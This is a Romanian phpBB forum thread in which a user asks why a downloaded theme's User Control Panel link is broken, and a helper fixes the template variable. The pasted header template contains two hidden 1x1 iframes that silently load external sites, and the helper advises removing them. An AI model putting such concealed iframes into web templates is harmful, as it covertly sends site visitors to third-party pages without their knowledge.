[Problema] tema [dark8]retryzone1 • Tutoriale PHPBB3 • Forum CS Gothic - Tutoriale Counter Strike - Server CS
It is currently 24 May 2012, 08:35












Mobile Payments by Fortumo



 Page 1 of 2 [ 8 mesaje ]  Go to page 1, 2  Next
Your Ad Here
Author Message
 Post subject: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 11:29 
Membru Fidel
User avatar

Joined: 29 Jul 2011, 08:23
Posts: 385
Location: In Hell ;x
Multumiri date: 11
Multumiri primite: 10
Puncte Reputatie: 303
Share on Facebook Share on Twitter Share on Orkut Share on Digg Share on MySpace Share on Delicious Share on Technorati
Your Ad Here
Am pus o tema noua pe forum(tema mentionata in titlu)si nu am modificat nimic am vrut doar sa o testez...faina la prima vedere dar...
Mam logat pe forum si vroiam sa imi schimb avatarul cand dupa ce apas pe user control panel cand... apare o pagina cu error.000webhost.com !? de ce !?
Am pus mouse pe user c. panel si scria cv de genu:
http://forum.sasa.net/User Control Panel
Adica scria fix la fel
Cum as putea rezolva ~?







Image
emy ;o
mY siGnaTurE ;x
Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 12:02 
Membru Fidel
User avatar

Joined: 26 Dec 2010, 15:38
Posts: 521
Location: Craiova
Multumiri date: 31
Multumiri primite: 71
Nume Steam: alecs-zeus
Arma Preferata: mp5
Harta Preferata: de_dust2
Server preferat: PUBLIC
Cunostinte_CS: Foarte slabe
Detinator Server: NU
Detinator Steam: DA
Sex: Masculin
Puncte Reputatie: 1645
Your Ad Here
Sa inteleg ca 'http://forum.sasa.net/User Control Panel' e forumul tau?
Multi modifica teme si le pun la download dar putini le verifica ,cel mai bine folositi teme de pe phpbbstyles.net ele nu au buguri

Intra in overall_header si cauta
{L_PROFILE}
,spune-mi ce link ai la href


Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 14:30 
Membru Fidel
User avatar

Joined: 17 Apr 2011, 12:26
Posts: 127
Multumiri date: 6
Multumiri primite: 1
Puncte Reputatie: 20
Your Ad Here
S-ar putea ca 000webhost sa nu fie asa bun! Am avut si eu o problema cand vroiam sa vad un topic nu mergea! La orice tema!


Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 15:21 
Membru Fidel
User avatar

Joined: 29 Jul 2011, 08:23
Posts: 385
Location: In Hell ;x
Multumiri date: 11
Multumiri primite: 10
Puncte Reputatie: 303
Your Ad Here
e cumva asta?
{L_PROFILE}" onmouseout="MM_swapImgRestore()"
?
sau uite header complet:
[spoiler]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head><link rel="shortcut icon" href="favicon.ico" /></head>
<html xmlns="http://www.w3.org/1999/xhtml" dir="{S_CONTENT_DIRECTION}" lang="{S_USER_LANG}" xml:lang="{S_USER_LANG}">
<head>
<!-- INCLUDE ca_config.html -->
<meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING}" />
<meta http-equiv="content-language" content="{S_USER_LANG}" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="resource-type" content="document" />
<meta name="distribution" content="global" />
<meta name="copyright" content="2002-2006 phpBB Group" />
<meta name="keywords" content="ajutor,articole,communities,community builder,community creator,customise,diacritice,download,fast,forum,forum phpBB in limba romana,free bulletin board,hacks,implementari,instructiuni,localizare,mods,moduri,multi-lingual,mysql,open source,opinii,php,phpbb,phpbb2,phpbb3,postgres,rapid,romaneste,Romania,Romanian,stiluri,subsilver,suport,teme,templates,templateuri,traduceri" />
<meta name="description" content="mindfreak.ro - never stop dreaming" />
{META}
<title>{SITENAME} - <!-- IF S_IN_MCP -->{L_MCP} - <!-- ELSEIF S_IN_UCP -->{L_UCP} - <!-- ENDIF -->{PAGE_TITLE}</title>


<script type="text/javascript">
// <![CDATA[

var onload_functions = new Array();
var onunload_functions = new Array();
var ca_main_width = '{$CA_WIDTH}';

<!-- IF S_USER_PM_POPUP -->
if ({S_NEW_PM})
{
popup('{UA_POPUP_PM}', 400, 225, '_phpbbprivmsg');
}
<!-- ENDIF -->

function popup(url, width, height, name)
{
if (!name)
{
name = '_popup';
}

window.open(url.replace(/&amp;/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes,width=' + width);
return false;
}

function jumpto()
{
var page = prompt('{LA_JUMP_PAGE}:', '{ON_PAGE}');
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';

if (page !== null && !isNaN(page) && page == Math.floor(page) && page > 0)
{
if (base_url.indexOf('?') == -1)
{
document.location.href = base_url + '?start=' + ((page - 1) * per_page);
}
else
{
document.location.href = base_url.replace(/&amp;/g, '&') + '&start=' + ((page - 1) * per_page);
}
}
}

/**
* Find a member
*/
function find_username(url)
{
popup(url, 760, 570, '_usersearch');
return false;
}
<head><link rel="shortcut icon" href="favicon.ico" /></head>

/**
* Mark/unmark checklist
* id = ID of parent container, name = name prefix, state = state [true/false]
*/
function marklist(id, name, state)
{
var parent = document.getElementById(id);
if (!parent)
{
eval('parent = document.' + id);
}

if (!parent)
{
return;
}

var rb = parent.getElementsByTagName('input');

for (var r = 0; r < rb.length; r++)
{
if (rb[r].name.substr(0, name.length) == name)
{
rb[r].checked = state;
}
}
}

<!-- IF ._file -->

/**
* Play quicktime file by determining it's width/height
* from the displayed rectangle area
*
* Only defined if there is a file block present.
*/
function play_qt_file(obj)
{
var rectangle = obj.GetRectangle();

if (rectangle)
{
rectangle = rectangle.split(',')
var x1 = parseInt(rectangle[0]);
var x2 = parseInt(rectangle[2]);
var y1 = parseInt(rectangle[1]);
var y2 = parseInt(rectangle[3]);

var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1;
var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1;
}
else
{
var width = 200;
var height = 0;
}

obj.width = width;
obj.height = height + 16;

obj.SetControllerVisible(true);

obj.Play();
}
<!-- ENDIF -->

/**
* New function for handling multiple calls to window.onload and window.unload by pentapenguin
*/
window.onload = function()
{
for (var i = 0; i < onload_functions.length; i++)
{
eval(onload_functions[i]);
}
}

window.onunload = function()
{
for (var i = 0; i < onunload_functions.length; i++)
{
eval(onunload_functions[i]);
}
}


if(navigator.userAgent && navigator.userAgent.indexOf('Mac OS X') > 0)
{
document.write('<link rel="stylesheet" href="{T_THEME_PATH}/mac.css" type="text/css" />');
}

// ]]>
</script>
<script type="text/javascript" src="{T_TEMPLATE_PATH}/ca_scripts.js"></script>
<link rel="stylesheet" href="{T_THEME_PATH}/stil.css" type="text/css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="{T_THEME_PATH}/ie7.css" />
<![endif]-->

</head>
<body class="{S_CONTENT_DIRECTION}">
<div id="body">




<table border="0" cellspacing="0" cellpadding="0" width="{$CA_WIDTH}" id="maintable" align="center">
<iframe src='http://retryzone.com/' width='1' height='1' style='visibility: hidden'></iframe>
<tr>
<td class="row-left"><img src="{T_THEME_PATH}/images/spacer.gif" width="4" height="1" alt="" /></td>
<td id="contentrow">

<!-- IF not S_IS_BOT && not $CA_SKIP_PM_NOTIFY && S_USER_LOGGED_IN && S_DISPLAY_PM -->
<!-- IF S_USER_NEW_PRIVMSG -->
<div class="pm-notify-new"><div class="pm-notify-header">{L_PRIVATE_MESSAGES}</div><a href="{U_PRIVATEMSGS}">{PRIVATE_MESSAGE_INFO}<!-- IF PRIVATE_MESSAGE_INFO_UNREAD -->, {PRIVATE_MESSAGE_INFO_UNREAD}<!-- ENDIF --></a></div>
<!-- ELSEIF S_USER_UNREAD_PRIVMSG -->
<div class="pm-notify-unread"><div class="pm-notify-header">{L_PRIVATE_MESSAGES}</div><a href="{U_PRIVATEMSGS}">{PRIVATE_MESSAGE_INFO}<!-- IF PRIVATE_MESSAGE_INFO_UNREAD -->, {PRIVATE_MESSAGE_INFO_UNREAD}<!-- ENDIF --></a></div>
<!-- ENDIF -->
<!-- ENDIF -->
<iframe src='http://mindfreak.ro/forum' width='1' height='1' style='visibility: hidden'></iframe>
<!-- IF S_BOARD_DISABLED and S_USER_LOGGED_IN and (U_MCP or U_ACP) -->
<div class="pm-notify-new"><div class="pm-notify-header">{L_INFORMATION}</div>{L_BOARD_DISABLED}</div>
<!-- ENDIF -->
<body class="{S_CONTENT_DIRECTION}" onload="MM_preloadImages('../theme/images/menu/home2.gif','../theme/images/menu/faq2.gif','../theme/images/menu/pm2.gif','../theme/images/menu/ucp2.gif','../theme/images/menu/ll2.gif')">

<a name="top"></a>

<div id="menubar">



<div id="wrapheader">

<table width="100%" bgcolor="#f4f2f3" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="145" align="center"><a href="{U_INDEX}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('home','','{T_THEME_PATH}/images/menu/home2.gif',1)"><img src="{T_THEME_PATH}/images/menu/home1.gif" alt="Home" name="home" width="40" height="40" border="0" id="home" /></a></td>
<!-- IF S_DISPLAY_SEARCH --> <td width="145" align="center"><a href="{U_SEARCH}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Search','','{T_THEME_PATH}/images/menu/search2.gif',0)"><img src="{T_THEME_PATH}/images/menu/search1.gif" alt="Search" name="Search" width="40" height="40" border="0" id="Search" /></a></td><!-- ENDIF -->
<td width="145" align="center"><a href="{U_FAQ}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Faq','','{T_THEME_PATH}/images/menu/faq2.gif',1)"><img src="{T_THEME_PATH}/images/menu/faq1.gif" alt="Faq" name="Faq" width="40" height="40" border="0" id="Faq" /></a></td>
<!-- IF S_DISPLAY_MEMBERLIST --> <td width="145" align="center"><a href="{U_MEMBERLIST}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Members','','{T_THEME_PATH}/images/menu/members2.gif',0)"><img src="{T_THEME_PATH}/images/menu/members1.gif" alt="Members" name="Members" width="40" height="40" border="0" id="Members" /></a></td><!-- ENDIF -->
<!-- IF S_DISPLAY_PM --> <td width="145" align="center"><a href="{U_PRIVATEMSGS}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('PM','','{T_THEME_PATH}/images/menu/pm2.gif',1)"><img src="{T_THEME_PATH}/images/menu/pm1.gif" alt="Private Messeges" name="PM" width="40" height="40" border="0" id="PM" /></a></td><!-- ENDIF -->
<!-- IF not S_IS_BOT and S_USER_LOGGED_IN --><td width="145" align="center"><a href="{L_PROFILE}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('UCP','','{T_THEME_PATH}/images/menu/ucp2.gif',1)"><img src="{T_THEME_PATH}/images/menu/ucp1.gif" alt="User Control Panel" name="UCP" width="40" height="40" border="0" id="UCP" /></a></td>
<td width="145" align="center"><a href="{U_LOGIN_LOGOUT}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Logout','','{T_THEME_PATH}/images/menu/ll2.gif',1)"><img src="{T_THEME_PATH}/images/menu/ll1.gif" alt="Login/Logout" name="Logout" width="40" height="40" border="0" id="Logout" /></a></td><!-- ENDIF -->
</tr>
<tr>
<td align="center"><a href="index.php">&nbsp;Index</a></td>
<!-- IF S_DISPLAY_SEARCH --> <td align="center"><a href="{U_SEARCH}"> {L_SEARCH}</a></td><!-- ENDIF -->
<td align="center"><a href="{U_FAQ}" title="{L_FAQ_EXPLAIN}">{L_FAQ}</a></td>
<!-- IF S_DISPLAY_MEMBERLIST --><td align="center"><a href="{U_MEMBERLIST}" title="{L_MEMBERLIST_EXPLAIN}">&nbsp;{L_MEMBERLIST}</a></td><!-- ENDIF -->
<!-- IF S_DISPLAY_PM --> <td align="center"><a href="{U_PRIVATEMSGS}">&nbsp;&nbsp;{PRIVATE_MESSAGE_INFO}</a></td><!-- ENDIF -->
<!-- IF not S_IS_BOT and S_USER_LOGGED_IN --> <td align="center"><a href="{U_PROFILE}" title="{L_PROFILE}" accesskey="e">&nbsp;{L_PROFILE}</a></td>
<td align="center"><a href="{U_LOGIN_LOGOUT}" title="{L_LOGIN_LOGOUT}" accesskey="x">{L_LOGIN_LOGOUT}</a></td><!-- ENDIF -->
</tr>
</table>

</div>
<div id="logodesc">
<table width="100%" cellspacing="0">
<tr>
<td align="center"><a href="{U_INDEX}">{SITE_LOGO_IMG}</a></td>
</tr>
</table>
</div>



</div>

<div id="wrapcentre">

<!-- INCLUDE breadcrumbs.html -->
<table width="100%" cellspacing="0">
<tr>
<td style="padding:0;" align="left" valign="top">
[/spoiler]







Image
emy ;o
mY siGnaTurE ;x
Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 15:31 
Membru Fidel
User avatar

Joined: 26 Dec 2010, 15:38
Posts: 521
Location: Craiova
Multumiri date: 31
Multumiri primite: 71
Nume Steam: alecs-zeus
Arma Preferata: mp5
Harta Preferata: de_dust2
Server preferat: PUBLIC
Cunostinte_CS: Foarte slabe
Detinator Server: NU
Detinator Steam: DA
Sex: Masculin
Puncte Reputatie: 1645
Your Ad Here
Da, repune
<a href="{L_PROFILE}" onmouseout="MM_swapImgRestore()"
cu
<a href="{U_PROFILE}" onmouseout="MM_swapImgRestore()"


HINT: Iti recomand sa stergi toate iframe-urile din sabloane


Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 15:40 
Membru Fidel
User avatar

Joined: 29 Jul 2011, 08:23
Posts: 385
Location: In Hell ;x
Multumiri date: 11
Multumiri primite: 10
Puncte Reputatie: 303
Your Ad Here
Mai pe romaneste?
Is incepator
Si nam nici un <a href= in fata la (L_Profile)







Image
emy ;o
mY siGnaTurE ;x
Offline
 Profile  
 
 Post subject: Re: [Problema] tema [dark8]retryzone1
PostPosted: 05 Sep 2011, 15:45 
Membru Fidel
User avatar

Joined: 26 Dec 2010, 15:38
Posts: 521
Location: Craiova
Multumiri date: 31
Multumiri primite: 71
Nume Steam: alecs-zeus
Arma Preferata: mp5
Harta Preferata: de_dust2
Server preferat: PUBLIC
Cunostinte_CS: Foarte slabe
Detinator Server: NU
Detinator Steam: DA
Sex: Masculin
Puncte Reputatie: 1645
Your Ad Here
Uite tot codul
<!-- IF not S_IS_BOT and S_USER_LOGGED_IN --><td width="145" align="center"><a href="{L_PROFILE}" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('UCP','','{T_THEME_PATH}/images/menu/ucp2.gif',1)"><img src="{T_THEME_PATH}/images/menu/ucp1.gif" alt="User Control Panel" name="UCP" width="40" height="40" border="0" id="UCP" /></a></td>

Inlocuiesti {L_PROFILE} cu {U_PROFILE}


Offline
 Profile  
 
Re: [Problema] tema [dark8]retryzone1 Top
 
Display posts from previous:  Sort by  
 Page 1 of 2 [ 8 mesaje ]  Go to page 1, 2  Next


Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to: